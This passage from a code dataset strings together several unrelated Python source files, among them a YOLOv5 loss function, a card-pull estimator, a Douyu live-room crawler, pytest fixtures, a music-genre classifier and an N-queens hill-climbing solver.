gt_targets = [targets['target{}'.format(i)] for i in range(np)]\n gt_box = targets['gt_bbox']\n yolo_losses = dict()\n self.distill_pairs.clear()\n for x, t, anchor, downsample in zip(inputs, gt_targets, anchors,\n self.downsample):\n yolo_loss = self.yolov3_loss(x, t, gt_box, anchor, downsample,\n self.scale_x_y)\n for k, v in yolo_loss.items():\n if k in yolo_losses:\n yolo_losses[k] += v\n else:\n yolo_losses[k] = v\n\n loss = 0\n for k, v in yolo_losses.items():\n loss += v\n\n yolo_losses['loss'] = loss\n return yolo_losses\n\n\n@register\nclass YOLOv5Loss(nn.Layer):\n __shared__ = ['num_classes']\n\n def __init__(self,\n num_classes=80,\n downsample_ratios=[8, 16, 32],\n balance=[4.0, 1.0, 0.4],\n box_weight=0.05,\n obj_weight=1.0,\n cls_weght=0.5,\n bias=0.5,\n anchor_t=4.0,\n label_smooth_eps=0.):\n super(YOLOv5Loss, self).__init__()\n self.num_classes = num_classes\n self.balance = balance\n self.na = 3 # not len(anchors)\n self.gr = 1.0\n\n self.BCEcls = nn.BCEWithLogitsLoss(\n pos_weight=paddle.to_tensor([1.0]), reduction=\"mean\")\n self.BCEobj = nn.BCEWithLogitsLoss(\n pos_weight=paddle.to_tensor([1.0]), reduction=\"mean\")\n\n self.loss_weights = {\n 'box': box_weight,\n 'obj': obj_weight,\n 'cls': cls_weght,\n }\n\n eps = label_smooth_eps if label_smooth_eps > 0 else 0.\n self.cls_pos_label = 1.0 - 0.5 * eps\n self.cls_neg_label = 0.5 * eps\n\n self.downsample_ratios = downsample_ratios\n self.bias = bias\n self.off = paddle.to_tensor(\n [\n [0, 0],\n [1, 0],\n [0, 1],\n [-1, 0],\n [0, -1], # j,k,l,m\n ],\n dtype='float32') * self.bias\n self.anchor_t = anchor_t\n\n def build_targets(self, outputs, targets, anchors):\n anchors = anchors.numpy()\n gt_nums = [len(bbox) for bbox in targets['gt_bbox']]\n nt = int(sum(gt_nums))\n na = anchors.shape[1] # not len(anchors)\n tcls, tbox, indices, anch = [], [], [], []\n\n gain = np.ones(7, dtype=np.float32) 
# normalized to gridspace gain\n ai = np.tile(\n np.arange(\n na, dtype=np.float32).reshape(na, 1),\n [1, nt]) # same as .repeat_interleave(nt)\n\n batch_size = outputs[0].shape[0]\n gt_labels = []\n for idx in range(batch_size):\n gt_num = gt_nums[idx]\n if gt_num == 0:\n continue\n gt_bbox = targets['gt_bbox'][idx][:gt_num]\n gt_class = targets['gt_class'][idx][:gt_num] * 1.0\n img_idx = np.repeat(np.array([[idx]]), gt_num, axis=0)\n gt_labels.append(\n np.concatenate(\n (img_idx, gt_class, gt_bbox), axis=-1))\n if (len(gt_labels)):\n gt_labels = np.concatenate(gt_labels)\n else:\n gt_labels = np.zeros([0, 6])\n\n targets_labels = np.concatenate((np.tile(\n np.expand_dims(gt_labels, 0), [na, 1, 1]), ai[:, :, None]), 2)\n g = 0.5 # bias\n off = np.array(\n [\n [0, 0],\n [1, 0],\n [0, 1],\n [-1, 0],\n [0, -1], # j,k,l,m\n ],\n dtype=np.float32) * g # offsets\n\n for i in range(len(anchors)):\n anchor = np.array(anchors[i]) / self.downsample_ratios[i]\n gain[2:6] = np.array(\n outputs[i].shape, dtype=np.float32)[[3, 2, 3, 2]] # xyxy gain\n\n # Match targets_labels to\n t = targets_labels * gain\n if nt:\n # Matches\n r = t[:, :, 4:6] / anchor[:, None]\n j = np.maximum(r, 1 / r).max(2) < self.anchor_t\n t = t[j] # filter\n\n # Offsets\n gxy = t[:, 2:4] # grid xy\n gxi = gain[[2, 3]] - gxy # inverse\n j, k = ((gxy % 1 < g) & (gxy > 1)).T\n l, m = ((gxi % 1 < g) & (gxi > 1)).T\n j = np.stack((np.ones_like(j), j, k, l, m))\n t = np.tile(t, [5, 1, 1])[j]\n offsets = (np.zeros_like(gxy)[None] + off[:, None])[j]\n else:\n t = targets_labels[0]\n offsets = 0\n\n # Define\n b, c = t[:, :2].astype(np.int64).T # image, class\n gxy = t[:, 2:4] # grid xy\n gwh = t[:, 4:6] # grid wh\n gij = (gxy - offsets).astype(np.int64)\n gi, gj = gij.T # grid xy indices\n\n # Append\n a = t[:, 6].astype(np.int64) # anchor indices\n gj, gi = gj.clip(0, gain[3] - 1), gi.clip(0, gain[2] - 1)\n indices.append((paddle.to_tensor(b), paddle.to_tensor(a),\n paddle.to_tensor(\n gj, dtype=paddle.int64), paddle.to_tensor(\n gi, dtype=paddle.int64)))\n tbox.append(\n paddle.to_tensor(\n np.concatenate((gxy - gij, gwh), 1), dtype=paddle.float32))\n anch.append(paddle.to_tensor(anchor[a]))\n tcls.append(paddle.to_tensor(c))\n return tcls, tbox, indices, anch\n\n def yolov5_loss(self, pi, t_cls, t_box, t_indices, t_anchor, balance):\n loss = dict()\n b, a, gj, gi = t_indices # image, anchor, gridy, gridx\n n = b.shape[0] # number of targets\n tobj = paddle.zeros_like(pi[:, :, :, :, 4])\n loss_box = paddle.to_tensor([0.])\n loss_cls = paddle.to_tensor([0.])\n if n:\n ps = pi.gather_nd(\n paddle.concat([\n b.reshape([-1, 1]), a.reshape([-1, 1]), gj.reshape([-1, 1]),\n gi.reshape([-1, 1])\n ], 1))\n # Regression\n pxy = F.sigmoid(ps[:, :2]) * 2 - 0.5\n pwh = (F.sigmoid(ps[:, 2:4]) * 2)**2 * t_anchor\n pbox = paddle.concat((pxy, pwh), 1) # predicted box # [21, 4]\n iou = bbox_iou(pbox.T, t_box.T, x1y1x2y2=False, ciou=True)\n # iou.stop_gradient = True\n loss_box = (1.0 - iou).mean()\n\n # Objectness\n score_iou = paddle.cast(iou.detach().clip(0), tobj.dtype)\n with paddle.no_grad():\n tobj[b, a, gj, gi] = (1.0 - self.gr\n ) + self.gr * score_iou # iou ratio\n\n # Classification\n t = paddle.full_like(ps[:, 5:], self.cls_neg_label)\n t[range(n), t_cls] = self.cls_pos_label\n loss_cls = self.BCEcls(ps[:, 5:], t)\n\n obji = self.BCEobj(pi[:, :, :, :, 4], tobj) # [4, 3, 80, 80]\n\n loss_obj = obji * balance\n\n loss['loss_box'] = loss_box * self.loss_weights['box']\n loss['loss_obj'] = loss_obj * self.loss_weights['obj']\n loss['loss_cls'] 
= loss_cls * self.loss_weights['cls']\n return loss\n\n def forward(self, inputs, targets, anchors):\n assert len(inputs) == len(anchors)\n assert len(inputs) == len(self.downsample_ratios)\n yolo_losses = dict()\n tcls, tbox, indices, anch = self.build_targets(inputs, targets, anchors)\n\n for i, (p_det, balance) in enumerate(zip(inputs, self.balance)):\n t_cls = tcls[i]\n t_box = tbox[i]\n t_anchor = anch[i]\n t_indices = indices[i]\n\n bs, ch, h, w = p_det.shape\n pi = p_det.reshape((bs, self.na, -1, h, w)).transpose(\n (0, 1, 3, 4, 2))\n\n yolo_loss = self.yolov5_loss(pi, t_cls, t_box, t_indices, t_anchor,\n balance)\n\n for k, v in yolo_loss.items():\n if k in yolo_losses:\n yolo_losses[k] += v\n else:\n yolo_losses[k] = v\n\n loss = 0\n for k, v in yolo_losses.items():\n loss += v\n\n batch_size = inputs[0].shape[0]\n num_gpus = targets.get('num_gpus', 8)\n yolo_losses['loss'] = loss * batch_size * num_gpus\n return yolo_losses\n","repo_name":"nemonameless/PaddleDetection_YOLOv5","sub_path":"ppdet/modeling/losses/yolo_loss.py","file_name":"yolo_loss.py","file_ext":"py","file_size_in_byte":14838,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"72"} +{"seq_id":"17634326410","text":"from typing import List, Optional\n\nimport numpy as np\nfrom algo_ops.ops.text import TextOp\n\nfrom card_recognizer.classifier.core.card_frame_run import CardFrameRun\nfrom card_recognizer.classifier.core.card_prediction_result import (\n CardPredictionResult,\n CardPrediction,\n)\nfrom card_recognizer.pulls_estimator.plots import plot_pull_stats\n\n\nclass PullsEstimator(TextOp):\n \"\"\"\n The PullsEstimator identifies the likely card pulls in a time series of image frames. It takes as input a time\n series of predictions of cards for frames in a video. The time series is represented as a CardPredictionResult\n object. The PullsEstimator filters out likely false positives in the time series based on frequencies of card\n detection and their confidence scores. The PullsEstimator then chooses the top-scoring cards based on the\n selection score: selection_score = card_frequency * confidence_score. 
The PullsEstimator returns the estimated\n    pulled cards in the video.\n    \"\"\"\n\n    def __init__(\n        self,\n        min_run_length: Optional[int] = 5,\n        min_run_conf: Optional[float] = 0.1,\n        run_tol: Optional[int] = 10,\n        num_cards_to_select: Optional[int] = 10,\n        output_figs_path: Optional[str] = None,\n        figs_paging: bool = False,\n    ):\n        \"\"\"\n        param min_run_length: The minimum length of a run to keep it as a card run detection (if None,\n            turn off filter and allow all runs to pass)\n        param min_run_conf: The minimum confidence score of a run to keep it as a card run detection (if None,\n            turn off filter and allow all runs to pass)\n        param run_tol: The number of consecutive noisy frames to tolerate within a run\n        param num_cards_to_select: The number of card pulls to estimate (if None, there is no limit)\n        param output_figs_path: Path to where output figs should go\n        param figs_paging: Whether figs should be paged\n        \"\"\"\n\n        # set params\n        super().__init__(func=self.estimate_pull_series)\n        self.min_run_length: Optional[int] = min_run_length\n        self.min_run_conf: Optional[float] = min_run_conf\n        self.run_tol: Optional[int] = run_tol\n        self.num_cards_to_select = num_cards_to_select\n        self.output_fig_path = output_figs_path\n        self.figs_paging = figs_paging\n\n        # define input/output types\n        self.input: Optional[CardPredictionResult] = None\n        self.output: Optional[CardPredictionResult] = None\n\n    def vis_input(self) -> None:\n        \"\"\"\n        Visualize input statistics.\n        \"\"\"\n        if self.input is None:\n            raise ValueError(\"There is no input to be visualized.\")\n        plot_pull_stats(\n            card_prediction_result=self.input,\n            output_fig_path=self.output_fig_path,\n            prefix=\"input\",\n            figs_paging=self.figs_paging,\n        )\n\n    def vis(self) -> None:\n        \"\"\"\n        Visualize output statistics.\n        \"\"\"\n        if self.output is None:\n            raise ValueError(\"There is no output to be visualized.\")\n        self.vis_input()\n        plot_pull_stats(\n            card_prediction_result=self.output,\n            output_fig_path=self.output_fig_path,\n            prefix=\"output\",\n            figs_paging=self.figs_paging,\n        )\n\n    def _apply_filter(self, runs: List[CardFrameRun]) -> List[CardFrameRun]:\n        \"\"\"\n        Filters a list of card runs on run length and max confidence score.\n\n        param runs: The input list of card runs\n\n        Returns:\n            keep: List of kept runs\n        \"\"\"\n        keep: List[CardFrameRun] = list()\n        for run in runs:\n            if (self.min_run_length is not None and len(run) < self.min_run_length) or (\n                self.min_run_conf is not None\n                and run.max_confidence_score < self.min_run_conf\n            ):\n                continue\n            else:\n                keep.append(run)\n        return keep\n\n    def _apply_selection(self, runs: List[CardFrameRun]) -> List[CardFrameRun]:\n        \"\"\"\n        Chooses a number of top runs based on selection score.\n\n        param runs: List of candidate runs\n\n        Returns:\n            selected_runs: List of selected runs\n        \"\"\"\n\n        # if num_cards_to_select is None, return all runs\n        if self.num_cards_to_select is None:\n            return runs\n\n        # perform selection based on selection scores\n        sorted_card_indices = np.argsort([-1.0 * run.selection_score for run in runs])\n        selected_runs: List[CardFrameRun] = [\n            runs[index] for index in sorted_card_indices[0 : self.num_cards_to_select]\n        ]\n        return selected_runs\n\n    @staticmethod\n    def _make_result(\n        runs: List[CardFrameRun], frame_card_prediction: CardPredictionResult\n    ) -> CardPredictionResult:\n        \"\"\"\n        Packages runs to CardPredictionResult.\n\n        params runs: List of runs\n        param frame_card_prediction: Previous CardPredictionResult object\n\n        Returns:\n            New card prediction result with just specified 
runs kept\n \"\"\"\n\n # find kept predictions from selected runs\n kept_predictions: List[CardPrediction] = list()\n for run in runs:\n kept_predictions.extend(\n frame_card_prediction.query_card_prediction(\n interval=run.interval, card_index=run.card_index\n )\n )\n kept_predictions.sort()\n\n # create return object\n rtn = CardPredictionResult(\n predictions=kept_predictions, num_frames=frame_card_prediction.num_frames\n )\n rtn.input_path = frame_card_prediction.input_path\n rtn.reference_set = frame_card_prediction.reference_set\n return rtn\n\n def estimate_pull_series(\n self,\n frame_card_predictions: CardPredictionResult,\n ) -> CardPredictionResult:\n \"\"\"\n Estimates series of pulled cards in a stream of card detections in images.\n\n param frame_card_predictions: CardPredictionResult object containing card frame predictions\n\n Returns:\n Filtered CardPredictionResult with frames removed for filtered-out (false positive) cards\n \"\"\"\n\n # apply filter\n kept_runs: List[CardFrameRun] = self._apply_filter(\n runs=frame_card_predictions.runs\n )\n\n # select cards based on selection score\n selected_runs: List[CardFrameRun] = self._apply_selection(runs=kept_runs)\n\n # create output CardPredictionResult object\n return self._make_result(\n runs=selected_runs, frame_card_prediction=frame_card_predictions\n )\n","repo_name":"prateekt/pokemon-card-recognizer","sub_path":"card_recognizer/pulls_estimator/pulls_estimator.py","file_name":"pulls_estimator.py","file_ext":"py","file_size_in_byte":6669,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36788167528","text":"#!/usr/bin/env python\n\n__author__ = 'Michael Meisinger'\n\nfrom pyon.core.governance import get_system_actor\nfrom ion.core.bootstrap_process import BootstrapPlugin, AbortBootstrap\nfrom pyon.public import IonObject, RT, log, ResourceQuery, PRED\nfrom pyon.util.containers import get_safe\n\nfrom interface.objects import ActorIdentity, Org\n\n\nclass BootstrapCore(BootstrapPlugin):\n \"\"\"\n Bootstrap plugin for core system resources.\n No service dependency\n \"\"\"\n\n def on_initial_bootstrap(self, process, config, **kwargs):\n # Detect if system has been started before by the presence of the ION system actor\n system_actor = get_system_actor()\n if system_actor:\n raise AbortBootstrap(\"System already initialized. 
Start with bootmode=restart or force_clean (-fc)!\")\n\n        # Create ION actor\n        actor_name = get_safe(config, \"system.system_actor\", \"ionsystem\")\n        sys_actor = ActorIdentity(name=actor_name, description=\"ION System Agent\")\n        process.container.resource_registry.create(sys_actor)\n\n    def on_restart(self, process, config, **kwargs):\n        # Delete leftover Service and associated Process resources\n        svc_ids, _ = process.container.resource_registry.find_resources(restype=RT.Service, id_only=True)\n\n        if svc_ids:\n            rq = ResourceQuery()\n            rq.set_filter(rq.filter_type(RT.Process),\n                          rq.filter_associated_from_subject(svc_ids, predicate=PRED.hasProcess))\n            proc_ids = process.container.resource_registry.find_resources_ext(query=rq.get_query(), id_only=True)\n\n            log.info(\"Deleting %s Service resources\", len(svc_ids))\n            process.container.resource_registry.rr_store.delete_mult(svc_ids)\n\n            if proc_ids:\n                log.info(\"Deleting %s Process resources\", len(proc_ids))\n                process.container.resource_registry.rr_store.delete_mult(proc_ids)\n","repo_name":"scionrep/scioncc","sub_path":"src/ion/process/bootstrap/plugins/bootstrap_core.py","file_name":"bootstrap_core.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"74011944234","text":"from requests import get\nfrom Settings import HEADERS\nimport json\nfrom data_cleaning.Extractor import Extractor\nfrom data_cleaning.content_clean import clean_content\n\nif __name__ == '__main__':\n    urls = []\n    for i in range(5):\n        response = get(\"https://www.douyu.com/japi/weblist/apinc/rec/list?uid=8b6321ddbef037034b351cab00081501&num=20\", headers=HEADERS)\n        data_json = json.loads(response.text)\n        data_url = (data_json['data'])\n        for data in data_url:\n            urls.append(f\"https://douyu.com/{data['roomId']}\")\n    print(f\"Crawled {len(urls)} live rooms in total\")\n    try:\n        for i in range(len(urls)):\n            ex = Extractor(threshold=20)\n            html = get(urls[i], headers=HEADERS).text\n            content = ex.filter_tags(html)\n            data = clean_content(ex.getText(content))\n            with open(f'E:/c++/毕业设计开发日志/06.文本数据集/娱乐/直播/{i}.txt', 'w', encoding='utf-8') as txtfile:\n                txtfile.write(data)\n            print(f\"Live room {i} processed\")\n        print(f'{i} live rooms processed in total')\n    except Exception as e:\n        print(e)\n\n","repo_name":"ulyyyyyy/GraduationProject_ghh","sub_path":"web_data_crawler/douyu_crawler.py","file_name":"douyu_crawler.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"}
{"seq_id":"42281010424","text":"def parse_data_config(path):\n    '''\n    Parse the data config file\n    '''\n    options = dict() # dictionary\n    options['gpus'] = '0,1,2,3,4'\n    options['num_workers'] = '10'\n    with open(path, 'r') as fp:\n        lines = fp.readlines()\n    for line in lines:\n        line = line.strip() # strip whitespace\n        if line == '' or line.startswith('#'): # skip blank lines and comment lines\n            continue\n        key, value = line.split('=') # extract the key-value pair on each line\n        options[key.strip()] = value.strip() # store it in the dictionary\n    return options\n\ndef parse_model_config(path):\n    '''\n    Parse the cfg network config file and return the model definitions\n    '''\n    file = open(path, 'r')\n    lines = file.read().split('\\n') # read line by line, returns a list\n    lines = [x for x in lines if x and not x.startswith('#')] # drop blank lines and comment lines\n    lines = [x.rstrip().lstrip() for x in lines] # strip whitespace on both sides\n    module_defs = [] # the cfg file is divided into blocks by [], each block corresponding to one operation such as convolution; read each block into this list\n    for line in lines:\n        if line.startswith('['): # a [ marks the start of a new block\n            module_defs.append({}) # store each block's parameters as a dict\n            module_defs[-1]['type'] = line[1:-1].rstrip() # store the block's type, e.g. convolutional\n            if 
module_defs[-1]['type'] == 'convolutional': # not every convolutional block has a batch_normalize parameter; for convenience later on, default it to 0 for every convolutional block\n                module_defs[-1]['batch_normalize'] = 0\n        else:\n            key, value = line.split('=') # split on '='; a convolutional block that has batch_normalize gets updated here\n            value = value.strip()\n            module_defs[-1][key.rstrip()] = value.lstrip()\n    return module_defs","repo_name":"ziyaxuanyi/my-yolo","sub_path":"utils/parse_config.py","file_name":"parse_config.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"73118067112","text":"import json\nimport os\nfrom datetime import datetime, timedelta\nfrom pathlib import Path\n\nimport jinja2\nimport pytest\nimport yaml\n\nfrom statify import (\n    config,\n    database_client,\n    spotify_client\n)\nfrom statify import webserver\nfrom statify.webserver import webserver as statify_webserver\n\n\nTEMPLATES = {}\n\n\ndef load_templates():\n    \"\"\"\n    Templates need to be pre-loaded, since pyfakefs breaks dynamic loading\n    (templates don't exist in the fake filesystem). There surely is a better way\n    to handle this.\n    \"\"\"\n    app = statify_webserver.app\n    for template in (Path(webserver.__file__).parent / 'templates').iterdir():\n        TEMPLATES[template.name] = app.jinja_loader.get_source(\n            app.jinja_env,\n            template.name,\n        )\n\n\nload_templates()\n\n\n@pytest.fixture\ndef app():\n    app = statify_webserver.app\n    app.jinja_loader = jinja2.FunctionLoader(lambda name: TEMPLATES[name])\n    return app\n\n\n@pytest.fixture\ndef statify_directory(fs):\n    os.makedirs(str(config.STATIFY_PATH), exist_ok=True)\n\n\n@pytest.fixture\ndef statify_config(fs):\n    os.makedirs(str(config.CONFIG_PATH.parent), exist_ok=True)\n    with open(str(config.CONFIG_PATH), 'w') as config_file:\n        yaml.dump(\n            {\n                'spotify_app': {\n                    'client_id': 'test_client_id',\n                    'client_secret': 'test_client_secret',\n                },\n                'throttling': 0,\n            },\n            config_file\n        )\n\n\n@pytest.fixture\ndef cached_token(fs, statify_directory):\n    with open(str(spotify_client.OAUTH_TOKENS_PATH), 'w') as token_file:\n        json.dump(\n            {\n                'token_type': 'Bearer',\n                'expires_in': 3600,\n                'expires_at': (datetime.utcnow()+timedelta(days=42)).timestamp(),\n                'scope': 'playlist-read-private user-read-recently-played',\n                'refresh_token': 'toto',\n                'access_token': 'toto',\n            },\n            token_file\n        )\n\n\n@pytest.fixture\ndef in_memory_database(mocker, statify_directory):\n    database = database_client.StatifyDatabase(':memory:')\n    mocker.patch(\n        'statify.statify.database_client.StatifyDatabase',\n        return_value=database,\n    )\n    yield database\n    database.close()\n\n\n@pytest.fixture\ndef sql_spy(mocker):\n    backup = database_client.StatifyDatabase._sql\n    database_client.StatifyDatabase._sql = mocker.MagicMock()\n    yield database_client.StatifyDatabase._sql\n    database_client.StatifyDatabase._sql = backup\n","repo_name":"foobuzz/statify","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"}
{"seq_id":"6476349064","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\nfrom collections import Counter\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.decomposition import PCA\nfrom sklearn import manifold\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import 
accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom xgboost import XGBClassifier\nfrom xgboost import plot_tree, plot_importance\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\n\n# In[ ]:\n\n\ndata_3_train = pd.read_csv('D:\\\\79886\\\\Documents\\\\HKUST\\\\Courses\\\\5001 Foundations of Data Analytics\\\\group_project\\\\ml\\\\features_3_sec_train.csv')\ndata_3_train\n\n\n# In[ ]:\n\n\ndata_3_1 = data_3_train.iloc[:,2:]\ndata_3_1.shape\n\n\n# In[ ]:\n\n\ndata_3_1.groupby(data_3_1['label']).describe()\n\n\n# In[ ]:\n\n\nY_3_train = data_3_1['label']\n# use all the features except label as X\nX_3_train = data_3_1.iloc[:,:-1]\n# convert the strings in the label column into numbers\nmap_label = {\"blues\":0, \"classical\":1, \"country\":2, \"disco\":3, \"hiphop\":4, \"jazz\":5, \"metal\":6, \"pop\":7, \"reggae\":8, \"rock\":9}\n# map() substitutes every element of label according to map_label\nY_3_train = Y_3_train.map(lambda x: map_label[x])\nclasses=[\"blues\", \"classical\", \"country\", \"disco\", \"hiphop\", \"jazz\", \"metal\", \"pop\", \"reggae\", \"rock\"]\n# check the class distribution in the training set to see whether the samples are imbalanced\nprint(Y_3_train.value_counts())\n\n\n# In[ ]:\n\n\ndata_3_test = pd.read_csv('D:\\\\79886\\\\Documents\\\\HKUST\\\\Courses\\\\5001 Foundations of Data Analytics\\\\group_project\\\\ml\\\\features_3_sec_test.csv')\ndata_3_test\n\n\n# In[ ]:\n\n\ndata_3_2 = data_3_test.iloc[:,2:]\ndata_3_2.shape\n\n\n# In[ ]:\n\n\ndata_3_2.groupby(data_3_2['label']).describe()\n\n\n# In[ ]:\n\n\nY_3_test = data_3_2['label']\n# use all the features except label as X\nX_3_test = data_3_2.iloc[:,:-1]\n# convert the strings in the label column into numbers\nmap_label = {\"blues\":0, \"classical\":1, \"country\":2, \"disco\":3, \"hiphop\":4, \"jazz\":5, \"metal\":6, \"pop\":7, \"reggae\":8, \"rock\":9}\n# map() substitutes every element of label according to map_label\nY_3_test = Y_3_test.map(lambda x: map_label[x])\nclasses=[\"blues\", \"classical\", \"country\", \"disco\", \"hiphop\", \"jazz\", \"metal\", \"pop\", \"reggae\", \"rock\"]\n# check the class distribution in the test set to see whether the samples are imbalanced\nprint(Y_3_test.value_counts())\n\n# In[15]:\n\n\nscaler = preprocessing.StandardScaler().fit(X_3_train)\n\n# if normalization\nX_3_train = scaler.transform(X_3_train)\nX_3_test = scaler.transform(X_3_test)\n\n\n# In[21]:\n\n# gs = XGBClassifier(n_estimators=500,learning_rate=0.1,max_depth=5).fit(X_3_train,Y_3_train) #0.58\n# gs = SVC().fit(X_3_train,Y_3_train) #0.59\ngs = LogisticRegression(max_iter=1000).fit(X_3_train,Y_3_train) #0.6\n# gs = MLPClassifier(alpha=1e-5, hidden_layer_sizes=(256,128,64,10), max_iter=400, learning_rate_init=0.005).fit(X_3_train,Y_3_train) #0.568\ngs.score(X_3_train,Y_3_train),gs.score(X_3_test,Y_3_test)\n\n# In[ ]:\n\npred = gs.predict(X_3_test)\nprint(pred)\n\n# In[ ]:\n\ndf = pd.DataFrame({'name': data_3_test['filename'], 'label': Y_3_test, 'pred':pred})\ndf.to_csv('D:\\\\79886\\\\Documents\\\\HKUST\\\\Courses\\\\5001 Foundations of Data Analytics\\\\group_project\\\\ml\\\\pred.csv')\n\n\n# In[ ]:\nfrom sklearn import metrics\nmetrics.accuracy_score(Y_3_test, pred)\n\n# In[ ]:\n\nc = [0]*250\nlp = [0]*250\nl = [0]*250\nfor i in range(250):\n    c[i] = Counter(df.loc[10*i:10*i+10,'pred'])\n    lp[i] = c[i].most_common(1)\n    l[i] = lp[i][0][0]\n\n\n# In[ ]:\n\nt = [0]*250\nfor i in range(250):\n    t[i] = df.loc[10*i,'label']\n    \npred30 = pd.DataFrame({'label': t, 
'pred':l})\n\n# In[ ]:\n\nmetrics.accuracy_score(pred30['label'], pred30['pred'])\n\nk = 0\nfor i in range(250):\n    if pred30.loc[i,'label'] == pred30.loc[i, 'pred']:\n        k+=1\n        \nacu = k/250\nprint(acu)\n\n# In[22]:\n\n# sum up the predicted probabilities\np = [0]*250\nprob = gs.predict_proba(X_3_test)\nfor i in range(250):\n    for j in range(10):\n        p[i] += prob[10*i+j]\n\n\n# In[22]:\n\np_max = [0]*250\nfor i in range(250):\n    p[i]=p[i].tolist()\n    p_max[i] = p[i].index(max(p[i]))\n\n# In[22]:\n\nprob30 = pd.DataFrame({'label': t, 'pred':p_max})\nmetrics.accuracy_score(prob30['label'], prob30['pred'])\n# lr 0.592 \n# xgboost 0.576\n","repo_name":"yetirita/Music-Genre-Classification-Recommendation","sub_path":"xgboost_test.py","file_name":"xgboost_test.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
{"seq_id":"28521504229","text":"from django.urls import path\n\nfrom .views import index, profile, RegisterView\n\napp_name = 'users'\n\n\nurlpatterns = [\n    path('', index, name=\"index\"),\n    path('profile/', profile, name='profile'),\n    path('register/', RegisterView.as_view(), name='register'),\n]\n","repo_name":"hunterallencodes/booksort","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"25928037659","text":"#Hill climbing algorithm\r\n\r\nimport random\r\nimport copy\r\nimport globals as gl\r\nfrom memory_profiler import profile\r\n\r\n# State class\r\nclass state:\r\n    def __init__ (self,queens,n):\r\n        self.queens = queens\r\n        self.n = n\r\n        self.matrix = self.matrix_generation() # Calls the function that generates the matrix\r\n        self.columns = self.columns() # Calls the functions that keep track of the amount of \r\n        self.diagonals = self.diagonals() # queens in each column and diagonal\r\n    \r\n    def matrix_generation(self): # Generating the state matrix\r\n        matrix = []\r\n        for x in range(0,n):\r\n            matrix.append([0]*n)\r\n        for q in queens:\r\n            matrix[q[0]][q[1]] = 1\r\n        return matrix\r\n    \r\n    def columns(self): # Function that stores the amount of queens in each column\r\n        columns = [0]*n\r\n        for q in queens:\r\n            columns[q[1]] += 1\r\n        return columns\r\n    \r\n    def diagonals(self): # Function that stores the amount of queens in each diagonal\r\n        diagonals = [] # diagonals[0] --> down diagonals\r\n        diagonals.append([0]*(n+1)) # diagonals[1] --> up diagonals\r\n        diagonals.append([0]*(n+1))\r\n        for q in queens:\r\n            if (q[0]-q[1])+2 <= n:\r\n                diagonals[0][(q[0]-q[1])+2] += 1 # adds one to the down diagonal\r\n            if (((q[0]+q[1])-1) >= 0) and (((q[0]+q[1])-1)<=n):\r\n                diagonals[1][(q[0]+q[1])-1] += 1 # adds one to the up diagonal\r\n        \r\n        return diagonals \r\n    \r\n    \r\n\r\ndef move_queen (q): # this function returns all the possible column positions where we can move a queen\r\n    new_queens = []\r\n    for x in range(0,n):\r\n        if x != q[1]:\r\n            new_queens.append((q[0],x))\r\n    return new_queens\r\n\r\n# Conflict count first version\r\ndef conflict_count_1st(queens):\r\n    conflicts = 0\r\n    for q in queens:\r\n        for k in queens: # checks every other queen\r\n            if k != q:\r\n                if q[1] == k[1]: # checks queen's column\r\n                    conflicts += 1\r\n                if abs(q[0]-k[0]) == abs(q[1]-k[1]): # checks both queen's diagonals at the same time\r\n                    conflicts += 1\r\n    return conflicts\r\n\r\n\r\n# Conflict count second version\r\n\r\ndef conflict_count_2nd(state):\r\n    conflicts = 0\r\n    for q in state.queens:\r\n        if state.columns[q[1]] > 1: # checks the amount of queens in q's column\r\n            conflicts += (state.columns[q[1]]-1)\r\n        if ((q[0]-q[1])+2) <= n: \r\n            if 
state.diagonals[0][(q[0]-q[1])+2] > 1: # checks the amount of queens in q's down diagonal\r\n                conflicts += (state.diagonals[0][(q[0]-q[1])+2]-1)\r\n        if (((q[0]+q[1])-1) >= 0) and (((q[0]+q[1])-1)<=n):\r\n            if state.diagonals[1][(q[0]+q[1])-1] > 1: # checks the amount of queens in q's up diagonal\r\n                conflicts += (state.diagonals[1][(q[0]+q[1])-1]-1)\r\n    return conflicts\r\n\r\n# Function that finds all the indices where a certain element occurs in a list\r\ndef find_indices(list_to_check, item_to_find):\r\n    return [idx for idx, value in enumerate(list_to_check) if value == item_to_find]\r\n\r\n#First version\r\n\r\n@profile\r\ndef first_version(initial_state, steps):\r\n    current_state = initial_state\r\n    while conflict_count_1st(current_state.queens) != 0: # it keeps running while the number of conflicts is different from 0\r\n        \r\n        new_states_queens = [] # here we store all the possible new state queen's configurations\r\n        conflicts = int(conflict_count_1st(current_state.queens)/2)\r\n        for q in current_state.queens: # we do this for each one of the n queens\r\n            moved_q = move_queen(q) # call the move_queen function\r\n            state_queens = copy.deepcopy(current_state.queens) \r\n            state_queens.remove(q) # Removes q's original position\r\n\r\n            for i in moved_q: # for every queen's possible new position we create a new configuration\r\n                state_queens.insert(q[0],i)\r\n                new_states_queens.append(copy.deepcopy(state_queens)) # we 